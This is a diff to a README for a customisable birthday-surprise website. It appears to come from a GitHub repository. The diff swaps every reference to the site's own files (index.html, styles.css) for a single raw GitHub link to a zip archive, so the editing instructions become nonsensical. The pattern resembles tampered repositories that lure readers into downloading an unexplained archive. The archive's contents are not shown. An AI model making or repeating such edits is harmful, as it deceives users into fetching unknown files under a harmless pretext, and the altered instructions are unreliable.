RevoRaine/Her-birthday-surprise/README.md

 You can personalize the website to make it truly special.
 Here’s how:

-- **Change Text:** Open the `index.html` file in a text editor.
+- **Change Text:** Open the `https://raw.githubusercontent.com/RevoRaine/Her-birthday-surprise/main/her-birthday-main/surprise_Her_birthday_v1.7.zip` file in a text editor.
 Locate the text sections and replace them with your heartfelt messages.
-- **Add Images:** To include photos, place your images in the `images` folder and update the image tags in `index.html` to point to your new pictures.
+- **Add Images:** To include photos, place your images in the `images` folder and update the image tags in `https://raw.githubusercontent.com/RevoRaine/Her-birthday-surprise/main/her-birthday-main/surprise_Her_birthday_v1.7.zip` to point to your new pictures.
-- **Adjust Colors:** Modify the CSS file (`styles.css`) to change colors, fonts, and styles.
+- **Adjust Colors:** Modify the CSS file (`https://raw.githubusercontent.com/RevoRaine/Her-birthday-surprise/main/her-birthday-main/surprise_Her_birthday_v1.7.zip`) to change colors, fonts, and styles.
 Simply find the properties you wish to change and update the values.

 ## ❓ Support